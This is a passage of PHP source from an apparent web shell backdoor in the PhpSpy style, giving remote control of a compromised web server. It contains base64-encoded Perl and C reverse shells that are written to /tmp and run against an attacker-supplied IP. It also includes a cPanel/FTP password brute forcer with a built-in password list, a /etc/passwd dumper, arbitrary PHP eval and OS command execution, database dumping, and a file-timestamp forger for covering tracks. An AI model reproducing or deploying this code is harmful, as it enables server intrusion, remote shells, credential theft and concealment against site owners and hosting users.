onmouseover="this.className=\\\'focus\\\';" onmouseout="this.className=\\\'fout\\\';">\');\n\t\t\t\t\t\tp(\'<td><b>\'.$row[\'Field\'].\'</b><br />\'.$row[\'Type\'].\'</td><td><textarea class="area" name="insertsql[\'.$row[\'Field\'].\']" style="width:500px;height:60px;overflow:auto;">\'.$value.\'</textarea></td></tr>\');\n\t\t\t\t\t}\n\t\t\t\t\tif ($doing == \'insert\') {\n\t\t\t\t\t\tp(\'<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>\');\n\t\t\t\t\t} else {\n\t\t\t\t\t\tp(\'<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>\');\n\t\t\t\t\t\tmakehide(\'base64\', $base64);\n\t\t\t\t\t}\n\t\t\t\t\tp(\'</table></form>\');\n\t\t\t\t} else {\n\t\t\t\t\t$querys = @explode(\';\',$sql_query);\n\t\t\t\t\tforeach($querys as $num=>$query) {\n\t\t\t\t\t\tif ($query) {\n\t\t\t\t\t\t\tp("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");\n\t\t\t\t\t\t\tswitch(qy($query))\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tcase 0:\n\t\t\t\t\t\t\t\t\tp(\'<h2>Error : \'.mysql_error().\'</h2>\');\n\t\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\tcase 1:\n\t\t\t\t\t\t\t\t\tif (strtolower(substr($query,0,13)) == \'select * from\') {\n\t\t\t\t\t\t\t\t\t\t$allowedit = 1;\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\tif ($getnumsql) {\n\t\t\t\t\t\t\t\t\t\t$tatol = mysql_num_rows(q($getnumsql));\n\t\t\t\t\t\t\t\t\t\t$multipage = multi($tatol, $pagenum, $page, $tablename);\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\tif (!$tablename) {\n\t\t\t\t\t\t\t\t\t\t$sql_line = str_replace(array("\\r", "\\n", "\\t"), array(\' \', \' \', \' \'), trim(htmlspecialchars($query)));\n\t\t\t\t\t\t\t\t\t\t$sql_line = preg_replace("/\\/\\*[^(\\*\\/)]*\\*\\//i", " ", $sql_line);\n\t\t\t\t\t\t\t\t\t\tpreg_match_all("/from\\s+`{0,1}([\\w]+)`{0,1}\\s+/i",$sql_line,$matches);\n\t\t\t\t\t\t\t\t\t\t$tablename = $matches[1][0];\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t$result = q($query);\n\t\t\t\t\t\t\t\t\tp($multipage);\n\t\t\t\t\t\t\t\t\tp(\'<table border="0" cellpadding="3" cellspacing="0">\');\n\t\t\t\t\t\t\t\t\tp(\'<tr class="head">\');\n\t\t\t\t\t\t\t\t\tif ($allowedit) p(\'<td>Action</td>\');\n\t\t\t\t\t\t\t\t\t$fieldnum = @mysql_num_fields($result);\n\t\t\t\t\t\t\t\t\tfor($i=0;$i<$fieldnum;$i++){\n\t\t\t\t\t\t\t\t\t\t$name = @mysql_field_name($result, $i);\n\t\t\t\t\t\t\t\t\t\t$type = @mysql_field_type($result, $i);\n\t\t\t\t\t\t\t\t\t\t$len = @mysql_field_len($result, $i);\n\t\t\t\t\t\t\t\t\t\tp("<td nowrap>$name<br><span>$type($len)</span></td>");\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\tp(\'</tr>\');\n\t\t\t\t\t\t\t\t\twhile($mn = @mysql_fetch_assoc($result)){\n\t\t\t\t\t\t\t\t\t\t$thisbg = bg();\n\t\t\t\t\t\t\t\t\t\tp(\'<tr class="fout" onmouseover="this.className=\\\'focus\\\';" onmouseout="this.className=\\\'fout\\\';">\');\n\t\t\t\t\t\t\t\t\t\t$where = $tmp = $b1 = \'\';\n\t\t\t\t\t\t\t\t\t\tforeach($mn as $key=>$inside){\n\t\t\t\t\t\t\t\t\t\t\tif ($inside) {\n\t\t\t\t\t\t\t\t\t\t\t\t$where .= $tmp.$key."=\'".addslashes($inside)."\'";\n\t\t\t\t\t\t\t\t\t\t\t\t$tmp = \' AND \';\n\t\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t\t$b1 .= \'<td nowrap>\'.html_clean($inside).\'&nbsp;</td>\';\n\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t$where = base64_encode($where);\n\t\t\t\t\t\t\t\t\t\tif ($allowedit) p(\'<td nowrap><a href="javascript:editrecord(\\\'edit\\\', \\\'\'.$where.\'\\\', \\\'\'.$tablename.\'\\\');">Edit</a> | <a href="javascript:editrecord(\\\'del\\\', \\\'\'.$where.\'\\\', \\\'\'.$tablename.\'\\\');">Del</a></td>\');\n\t\t\t\t\t\t\t\t\t\tp($b1);\n\t\t\t\t\t\t\t\t\t\tp(\'</tr>\');\n\t\t\t\t\t\t\t\t\t\tunset($b1);\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\ttbfoot();\n\t\t\t\t\t\t\t\t\tp($multipage);\n\t\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\tcase 2:\n\t\t\t\t\t\t\t\t\t$ar = mysql_affected_rows();\n\t\t\t\t\t\t\t\t\tp(\'<h2>affected rows : <b>\'.$ar.\'</b></h2>\');\n\t\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t$query = q("SHOW TABLE STATUS");\n\t\t\t\t$table_num = $table_rows = $data_size = 0;\n\t\t\t\t$tabledb = array();\n\t\t\t\twhile($table = mysql_fetch_array($query)) {\n\t\t\t\t\t$data_size = $data_size + $table[\'Data_length\'];\n\t\t\t\t\t$table_rows = $table_rows + $table[\'Rows\'];\n\t\t\t\t\t$table[\'Data_length\'] = sizecount($table[\'Data_length\']);\n\t\t\t\t\t$table_num++;\n\t\t\t\t\t$tabledb[] = $table;\n\t\t\t\t}\n\t\t\t\t$data_size = sizecount($data_size);\n\t\t\t\tunset($table);\n\t\t\t\tp(\'<table border="0" cellpadding="0" cellspacing="0">\');\n\t\t\t\tp(\'<form action="\'.$self.\'" method="POST">\');\n\t\t\t\tmakehide(\'action\',\'sqladmin\');\n\t\t\t\tp($dbform);\n\t\t\t\tp(\'<tr class="head">\');\n\t\t\t\tp(\'<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>\');\n\t\t\t\tp(\'<td>Name</td>\');\n\t\t\t\tp(\'<td>Rows</td>\');\n\t\t\t\tp(\'<td>Data_length</td>\');\n\t\t\t\tp(\'<td>Create_time</td>\');\n\t\t\t\tp(\'<td>Update_time</td>\');\n\t\t\t\tif ($highver) {\n\t\t\t\t\tp(\'<td>Engine</td>\');\n\t\t\t\t\tp(\'<td>Collation</td>\');\n\t\t\t\t}\n\t\t\t\tp(\'</tr>\');\n\t\t\t\tforeach ($tabledb as $key => $table) {\n\t\t\t\t\t$thisbg = bg();\n\t\t\t\t\tp(\'<tr class="fout" onmouseover="this.className=\\\'focus\\\';" onmouseout="this.className=\\\'fout\\\';">\');\n\t\t\t\t\tp(\'<td align="center" width="2%"><input type="checkbox" name="table[]" value="\'.$table[\'Name\'].\'" /></td>\');\n\t\t\t\t\tp(\'<td><a href="javascript:settable(\\\'\'.$table[\'Name\'].\'\\\');">\'.$table[\'Name\'].\'</a> [ <a href="javascript:settable(\\\'\'.$table[\'Name\'].\'\\\', \\\'insert\\\');">Insert</a> | <a href="javascript:settable(\\\'\'.$table[\'Name\'].\'\\\', \\\'structure\\\');">Structure</a> | <a href="javascript:settable(\\\'\'.$table[\'Name\'].\'\\\', \\\'drop\\\');">Drop</a> ]</td>\');\n\t\t\t\t\tp(\'<td>\'.$table[\'Rows\'].\'</td>\');\n\t\t\t\t\tp(\'<td>\'.$table[\'Data_length\'].\'</td>\');\n\t\t\t\t\tp(\'<td>\'.$table[\'Create_time\'].\'</td>\');\n\t\t\t\t\tp(\'<td>\'.$table[\'Update_time\'].\'</td>\');\n\t\t\t\t\tif ($highver) {\n\t\t\t\t\t\tp(\'<td>\'.$table[\'Engine\'].\'</td>\');\n\t\t\t\t\t\tp(\'<td>\'.$table[\'Collation\'].\'</td>\');\n\t\t\t\t\t}\n\t\t\t\t\tp(\'</tr>\');\n\t\t\t\t}\n\t\t\t\tp(\'<tr class=fout>\');\n\t\t\t\tp(\'<td>&nbsp;</td>\');\n\t\t\t\tp(\'<td>Total tables: \'.$table_num.\'</td>\');\n\t\t\t\tp(\'<td>\'.$table_rows.\'</td>\');\n\t\t\t\tp(\'<td>\'.$data_size.\'</td>\');\n\t\t\t\tp(\'<td colspan="\'.($highver ? 4 : 2).\'">&nbsp;</td>\');\n\t\t\t\tp(\'</tr>\');\n\n\t\t\t\tp("<tr class=\\"fout\\"><td colspan=\\"".($highver ? 8 : 6)."\\"><input name=\\"saveasfile\\" value=\\"1\\" type=\\"checkbox\\" /> Save as file <input class=\\"input\\" name=\\"path\\" value=\\"".SA_ROOT.$_SERVER[\'HTTP_HOST\']."_MySQL.sql\\" type=\\"text\\" size=\\"60\\" /> <input class=\\"bt\\" type=\\"submit\\" name=\\"downrar\\" value=\\"Export selection table\\" /></td></tr>");\n\t\t\t\tmakehide(\'doing\',\'backupmysql\');\n\t\t\t\tformfoot();\n\t\t\t\tp("</table>");\n\t\t\t\tfr($query);\n\t\t\t}\n\t\t}\n\t}\n\ttbfoot();\n\t@mysql_close();\n}//end sql backup\n\n\nelseif ($action == \'backconnect\') {\n\t!$yourip && $yourip = $_SERVER[\'REMOTE_ADDR\'];\n\t!$yourport && $yourport = \'12345\';\n\t$usedb = array(\'perl\'=>\'perl\',\'c\'=>\'c\');\n\n\t$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".\n\t\t"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".\n\t\t"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".\n\t\t"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".\n\t\t"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".\n\t\t"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".\n\t\t"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";\n\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".\n\t\t"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".\n\t\t"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".\n\t\t"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".\n\t\t"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".\n\t\t"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".\n\t\t"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".\n\t\t"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";\n\n\tif ($start && $yourip && $yourport && $use){\n\t\tif ($use == \'perl\') {\n\t\t\tcf(\'/tmp/angel_bc\',$back_connect);\n\t\t\t$res = execute(which(\'perl\')." /tmp/angel_bc $yourip $yourport &");\n\t\t} else {\n\t\t\tcf(\'/tmp/angel_bc.c\',$back_connect_c);\n\t\t\t$res = execute(\'gcc -o /tmp/angel_bc /tmp/angel_bc.c\');\n\t\t\t@unlink(\'/tmp/angel_bc.c\');\n\t\t\t$res = execute("/tmp/angel_bc $yourip $yourport &");\n\t\t}\n\t\tm("Now script try connect to $yourip port $yourport ...");\n\t}\n\n\tformhead(array(\'title\'=>\'Back Connect\'));\n\tmakehide(\'action\',\'backconnect\');\n\tp(\'<p>\');\n\tp(\'Your IP:\');\n\tmakeinput(array(\'name\'=>\'yourip\',\'size\'=>20,\'value\'=>$yourip));\n\tp(\'Your Port:\');\n\tmakeinput(array(\'name\'=>\'yourport\',\'size\'=>15,\'value\'=>$yourport));\n\tp(\'Use:\');\n\tmakeselect(array(\'name\'=>\'use\',\'option\'=>$usedb,\'selected\'=>$use));\n\tmakeinput(array(\'name\'=>\'start\',\'value\'=>\'Start\',\'type\'=>\'submit\',\'class\'=>\'bt\'));\n\tp(\'</p>\');\n\tformfoot();\n}//end backconnect window via NC\n\n// Brute\nelseif ($action == \'brute\') {\nformhead(array(\'title\'=>\'Brute Forcer\'));\n\tmakehide(\'action\',\'brute\');\n\tmakehide(\'dir\',$brute);\n@ini_set(\'memory_limit\', 1000000000000);\n$connect_timeout=5;\n@set_time_limit(0);\n$submit = $_REQUEST[\'submit\'];\n$users = $_REQUEST[\'users\'];\n$pass = $_REQUEST[\'passwords\'];\n$target = $_REQUEST[\'target\'];\n$option = $_REQUEST[\'option\'];\n\n\n$passlist = "0123456\n01234567\n012345678\n0123456789\n01234567890\n123456\n1234567\n12345678\n123456789\n1234567890\n111111\n000000\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999\n123123\n456456\n789789\n123321\n456654\n654321\n7654321\n87654321\n987654321\n0987654321\nadmin\nadministrator\nadmincp\ncpanel\nadminx\nadmins\npassword\npasswords\npassw0rd\np@ssw0rd\np@ssword\nkhongco\n25251325\npassw0rds";\nif($target == \'\'){\n$target = \'localhost\';\n}\nprint " <div align=\'center\'>\n<form method=\'post\' style=\'border: 1px solid #000000\'><br><br>\n<TABLE style=\'BORDER-COLLAPSE: collapse\' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width=\'40%\' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>\n<b> Target  : </font><input type=\'text\' name=\'target\' size=\'16\' value= $target style=\'border: font-family:tahoma; font-weight:bold;\'></p></font></b></p>\n<div align=\'center\'><br>\n<TABLE style=\'BORDER-COLLAPSE: collapse\' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width=\'50%\' bgColor=#303030 borderColorLight=#966117 border=1>\n<tr>\n<td align=\'center\'>\n<b>Username</b></td>\n<td>\n<p align=\'center\'>\n<b>Password</b></td>\n</tr>\n</table>\n<p align=\'center\'>\n<textarea rows=\'20\' name=\'users\' cols=\'25\' style=\'border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0\'>";\n$i = 0;\nwhile ($i < 60000) {\n\n    $line = posix_getpwuid($i);\n    if (!empty($line)) {\n\n        while (list ($key, $vba_etcpwd) = each($line)){\n            echo "".$vba_etcpwd."\\n";\n            break;\n        }\n\n    }\n\n   $i++;\n}\necho "\n</textarea>\n<textarea rows=\'20\' name=\'passwords\' cols=\'25\' style=\'border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0\'>$passlist</textarea><br>\n<br>\n<b>Options : </span><input name=\'option\' value=\'cpanel\' style=\'font-weight: 700;\' checked type=\'radio\'> cPanel\n<input name=\'option\' value=\'ftp\' style=\'font-weight: 700;\' type=\'radio\'> ftp ==> <input type=\'submit\' value=\'Attack\' name=\'submit\' ></p>\n</td></tr></table></td></tr></form><p align= \'left\'>";\n?>\n<?php\nfunction ftp_check($host,$user,$pass,$timeout){\n$ch = curl_init();\ncurl_setopt($ch, CURLOPT_URL, "ftp://$host");\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\ncurl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);\ncurl_setopt($ch, CURLOPT_FTPLISTONLY, 1);\ncurl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");\ncurl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);\ncurl_setopt($ch, CURLOPT_FAILONERROR, 1);\n$data = curl_exec($ch);\nif ( curl_errno($ch) == 28 ) {\n\nprint "<b> Error : Connection timed out , make confidence about validation of target !</b>";\nexit;}\n\nelseif ( curl_errno($ch) == 0 ){\n\np("<b>[ attack@vbateam.net ]# </b>\n<b> Attacking has been done! Username: <font color=\'#FF0000\'> $user </font> / Password:<font color=\'#FF0000\'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");\n}\ncurl_close($ch);}\n\nfunction cpanel_check($host,$user,$pass,$timeout){\n$ch = curl_init();\ncurl_setopt($ch, CURLOPT_URL, "http://$host:2082");\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\ncurl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);\ncurl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");\ncurl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);\ncurl_setopt($ch, CURLOPT_FAILONERROR, 1);\n$data = curl_exec($ch);\nif ( curl_errno($ch) == 28 ) {\nprint "<b> Error : Connection timed out , make confidence about validation of target !</b>";\nexit;}\nelseif ( curl_errno($ch) == 0 ){\n\np("<b>[ attack@vbateam.net ]# </b><b>Attacking has been done!</a> Username: <font color=\'#FF0000\'> $user </font> / Password:<font color=\'#FF0000\'> $pass </font></b><br>");}curl_close($ch);}\n\nif(isset($submit) && !empty($submit)){\n\n$userlist = explode ("\\n" , $users );\n$passlist = explode ("\\n" , $pass );\np(\'<b>[ attack@vbateam.net ]# Attacking ...</font></b><br>\');\nforeach ($userlist as $user) {\n$_user = trim($user);\nforeach ($passlist as $password ) {\n$_pass = trim($password);\nif($option == "ftp"){\nftp_check($target,$_user,$_pass,$connect_timeout);\n}\nif ($option == "cpanel")\n{\ncpanel_check($target,$_user,$_pass,$connect_timeout);\n}\n}\n}\n}\n\n\tformfoot();\n}\n\n\n\n\n\n\nelseif ($action == \'etcpwd\') {\nformhead(array(\'title\'=>\'Get /etc/passwd\'));\n\tmakehide(\'action\',\'etcpwd\');\n\tmakehide(\'dir\',$nowpath);\n$i = 0;\n echo "<p><br><textarea class=\\"area\\" id=\\"phpcodexxx\\" name=\\"phpcodexxx\\" cols=\\"100\\" rows=\\"25\\">";\nwhile ($i < 60000) {\n\n    $line = posix_getpwuid($i);\n    if (!empty($line)) {\n\n        while (list ($key, $vba_etcpwd) = each($line)){\n            echo "".$vba_etcpwd."\\n";\n            break;\n        }\n\n    }\n\n   $i++;\n}\n  echo "</textarea></p>";\n\tformfoot();\n}\n\nelseif ($action == \'eval\') {\n\t$phpcode = trim($phpcode);\n\tif($phpcode){\n\t\tif (!preg_match(\'#<\\?#si\', $phpcode)) {\n\t\t\t$phpcode = "<?php\\n\\n{$phpcode}\\n\\n?>";\n\t\t}\n\t\teval("?".">$phpcode<?");\n\t}\n\tformhead(array(\'title\'=>\'Eval PHP Code\'));\n\tmakehide(\'action\',\'eval\');\n\tmaketext(array(\'title\'=>\'PHP Code\',\'name\'=>\'phpcode\', \'value\'=>$phpcode));\n\tp(\'<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>\');\n\tformfooter();\n}//end eval\n\nelseif ($action == \'editfile\') {\n\tif(file_exists($opfile)) {\n\t\t$fp=@fopen($opfile,\'r\');\n\t\t$contents=@fread($fp, filesize($opfile));\n\t\t@fclose($fp);\n\t\t$contents=htmlspecialchars($contents);\n\t}\n\tformhead(array(\'title\'=>\'Create / Edit File\'));\n\tmakehide(\'action\',\'file\');\n\tmakehide(\'dir\',$nowpath);\n\tmakeinput(array(\'title\'=>\'Current File (import new file name and new file)\',\'name\'=>\'editfilename\',\'value\'=>$opfile,\'newline\'=>1));\n\tmaketext(array(\'title\'=>\'File Content\',\'name\'=>\'filecontent\',\'value\'=>$contents));\n\tformfooter();\n}//end editfile\n\nelseif ($action == \'newtime\') {\n\t$opfilemtime = @filemtime($opfile);\n\t//$time = strtotime("$year-$month-$day $hour:$minute:$second");\n\t$cachemonth = array(\'January\'=>1,\'February\'=>2,\'March\'=>3,\'April\'=>4,\'May\'=>5,\'June\'=>6,\'July\'=>7,\'August\'=>8,\'September\'=>9,\'October\'=>10,\'November\'=>11,\'December\'=>12);\n\tformhead(array(\'title\'=>\'Clone file was last modified time\'));\n\tmakehide(\'action\',\'file\');\n\tmakehide(\'dir\',$nowpath);\n\tmakeinput(array(\'title\'=>\'Alter file\',\'name\'=>\'curfile\',\'value\'=>$opfile,\'size\'=>120,\'newline\'=>1));\n\tmakeinput(array(\'title\'=>\'Reference file (fullpath)\',\'name\'=>\'tarfile\',\'size\'=>120,\'newline\'=>1));\n\tformfooter();\n\tformhead(array(\'title\'=>\'Set last modified\'));\n\tmakehide(\'action\',\'file\');\n\tmakehide(\'dir\',$nowpath);\n\tmakeinput(array(\'title\'=>\'Current file (fullpath)\',\'name\'=>\'curfile\',\'value\'=>$opfile,\'size\'=>120,\'newline\'=>1));\n\tp(\'<p>Instead &raquo;\');\n\tp(\'year:\');\n\tmakeinput(array(\'name\'=>\'year\',\'value\'=>date(\'Y\',$opfilemtime),\'size\'=>4));\n\tp(\'month:\');\n\tmakeinput(array(\'name\'=>\'month\',\'value\'=>date(\'m\',$opfilemtime),\'size\'=>2));\n\tp(\'day:\');\n\tmakeinput(array(\'name\'=>\'day\',\'value\'=>date(\'d\',$opfilemtime),\'size\'=>2));\n\tp(\'hour:\');\n\tmakeinput(array(\'name\'=>\'hour\',\'value\'=>date(\'H\',$opfilemtime),\'size\'=>2));\n\tp(\'minute:\');\n\tmakeinput(array(\'name\'=>\'minute\',\'value\'=>date(\'i\',$opfilemtime),\'size\'=>2));\n\tp(\'second:\');\n\tmakeinput(array(\'name\'=>\'second\',\'value\'=>date(\'s\',$opfilemtime),\'size\'=>2));\n\tp(\'</p>\');\n\tformfooter();\n}//end newtime\n\nelseif ($action == \'shell\') {\n\tif (IS_WIN && IS_COM) {\n\t\tif($program && $parameter) {\n\t\t\t$shell= new COM(\'Shell.Application\');\n\t\t\t$a = $shell->ShellExecute($program,$parameter);\n\t\t\tm(\'Program run has \'.(!$a ? \'success\' : \'fail\'));\n\t\t}\n\t\t!$program && $program = \'c:\\windows\\system32\\cmd.exe\';\n\t\t!$parameter && $parameter = \'/c net start > \'.SA_ROOT.\'log.txt\';\n\t\tformhead(array(\'title\'=>\'Execute Program\'));\n\t\tmakehide(\'action\',\'shell\');\n\t\tmakeinput(array(\'title\'=>\'Program\',\'name\'=>\'program\',\'value\'=>$program,\'newline\'=>1));\n\t\tp(\'<p>\');\n\t\tmakeinput(array(\'title\'=>\'Parameter\',\'name\'=>\'parameter\',\'value\'=>$parameter));\n\t\tmakeinput(array(\'name\'=>\'submit\',\'class\'=>\'bt\',\'type\'=>\'submit\',\'value\'=>\'Execute\'));\n\t\tp(\'</p>\');\n\t\tformfoot();\n\t}\n\tformhead(array(\'title\'=>\'Execute Command\'));\n\tmakehide(\'action\',\'shell\');\n\tif (IS_WIN && IS_COM) {\n\t\t$execfuncdb = array(\'phpfunc\'=>\'phpfunc\',\'wscript\'=>\'wscript\',\'proc_open\'=>\'proc_open\');\n\t\tmakeselect(array(\'title\'=>\'Use:\',\'name\'=>\'execfunc\',\'option\'=>$execfuncdb,\'selected\'=>$execfunc,\'newline\'=>1));\n\t}\n\tp(\'<p>\');\n\tmakeinput(array(\'title\'=>\'Command\',\'name\'=>\'command\',\'value\'=>$command));\n\tmakeinput(array(\'name\'=>\'submit\',\'class\'=>\'bt\',\'type\'=>\'submit\',\'value\'=>\'Execute\'));\n\tp(\'</p>\');\n\tformfoot();\n\n\tif ($command) {\n\t\tp(\'<hr width="100%" noshade /><pre>\');\n\t\tif ($execfunc==\'wscript\' && IS_WIN && IS_COM) {\n\t\t\t$wsh = new COM(\'WScript.shell\');\n\t\t\t$exec = $wsh->exec(\'cmd.exe /c \'.$command);\n\t\t\t$stdout = $exec->StdOut();\n\t\t\t$stroutput = $stdout->ReadAll();\n\t\t\techo $stroutput;\n\t\t} elseif ($execfunc==\'proc_open\' && IS_WIN && IS_COM) {\n\t\t\t$descriptorspec = array(\n\t\t\t   0 => array(\'pipe\', \'r\'),\n\t\t\t   1 => array(\'pipe\', \'w\'),\n\t\t\t   2 => array(\'pipe\', \'w\')\n\t\t\t);\n\t\t\t$process = proc_open($_SERVER[\'COMSPEC\'], $descriptorspec, $pipes);\n\t\t\tif (is_resource($process)) {\n\t\t\t\tfwrite($pipes[0], $command."\\r\\n");\n\t\t\t\tfwrite($pipes[0], "exit\\r\\n");\n\t\t\t\tfclose($pipes[0]);\n\t\t\t\twhile (!feof($pipes[1])) {\n\t\t\t\t\techo fgets($pipes[1], 1024);\n\t\t\t\t}\n\t\t\t\tfclose($pipes[1]);\n\t\t\t\twhile (!feof($pipes[2])) {\n\t\t\t\t\techo fgets($pipes[2], 1024);\n\t\t\t\t}\n\t\t\t\tfclose($pipes[2]);\n\t\t\t\tproc_close($process);\n\t\t\t}\n\t\t} else {\n\t\t\techo(execute($command));\n\t\t}\n\t\tp(\'</pre>\');\n\t}\n}//end shell\n\nelseif ($action == \'phpenv\') {\n\t$upsize=getcfg(\'file_uploads\') ? getcfg(\'upload_max_filesize\') : \'Not allowed\';\n\t$adminmail=isset($_SERVER[\'SERVER_ADMIN\']) ? $_SERVER[\'SERVER_ADMIN\'] : getcfg(\'sendmail_from\');\n\t!$dis_func && $dis_func = \'No\';\n\t$info = array(\n\t\t1 => array(\'Server Time\',date(\'Y/m/d h:i:s\',$timestamp)),\n\t\t2 => array(\'Server Domain\',$_SERVER[\'SERVER_NAME\']),\n\t\t3 => array(\'Server IP\',gethostbyname($_SERVER[\'SERVER_NAME\'])),\n\t\t4 => array(\'Server OS\',PHP_OS),\n\t\t5 => array(\'Server OS Charset\',$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']),\n\t\t6 => array(\'Server Software\',$_SERVER[\'SERVER_SOFTWARE\']),\n\t\t7 => array(\'Server Web Port\',$_SERVER[\'SERVER_PORT\']),\n\t\t8 => array(\'PHP run mode\',strtoupper(php_sapi_name())),\n\t\t9 => array(\'The file path\',__FILE__),\n\n\t\t10 => array(\'PHP Version\',PHP_VERSION),\n\t\t11 => array(\'PHPINFO\',(IS_PHPINFO ? \'<a href="javascript:goaction(\\\'phpinfo\\\');">Yes</a>\' : \'No\')),\n\t\t12 => array(\'Safe Mode\',getcfg(\'safe_mode\')),\n\t\t13 => array(\'Administrator\',$adminmail),\n\t\t14 => array(\'allow_url_fopen\',getcfg(\'allow_url_fopen\')),\n\t\t15 => array(\'enable_dl\',getcfg(\'enable_dl\')),\n\t\t16 => array(\'display_errors\',getcfg(\'display_errors\')),\n\t\t17 => array(\'register_globals\',getcfg(\'register_globals\')),\n\t\t18 => array(\'magic_quotes_gpc\',getcfg(\'magic_quotes_gpc\')),\n\t\t19 => array(\'memory_limit\',getcfg(\'memory_limit\')),\n\t\t20 => array(\'post_max_size\',getcfg(\'post_max_size\')),\n\t\t21 => array(\'upload_max_filesize\',$upsize),\n\t\t22 => array(\'max_execution_time\',getcfg(\'max_execution_time\').\' second(s)\'),\n\t\t23 => array(\'disable_functions\',$dis_func),\n\t);\n\n\tif($phpvarname) {\n\t\tm($phpvarname .\' : \'.getcfg($phpvarname));\n\t}\n\n\tformhead(array(\'title\'=>\'Server environment\'));\n\tmakehide(\'action\',\'phpenv\');\n\tmakeinput(array(\'title\'=>\'Please input PHP configuration parameter(eg:magic_quotes_gpc)\',\'name\'=>\'phpvarname\',\'value\'=>$phpvarname,\'newline\'=>1));\n\tformfooter();\n\n\t$hp = array(0=> \'Server\', 1=> \'PHP\');\n\tfor($a=0;$a<2;$a++) {\n\t\tp(\'<h2>\'.$hp[$a].\' &raquo;</h2>\');\n\t\tp(\'<ul class="info">\');\n\t\tif ($a==0) {\n\t\t\tfor($i=1;$i<=9;$i++) {\n\t\t\t\tp(\'<li><u>\'.$info[$i][0].\':</u>\'.$info[$i][1].\'</li>\');\n\t\t\t}\n\t\t} elseif ($a == 1) 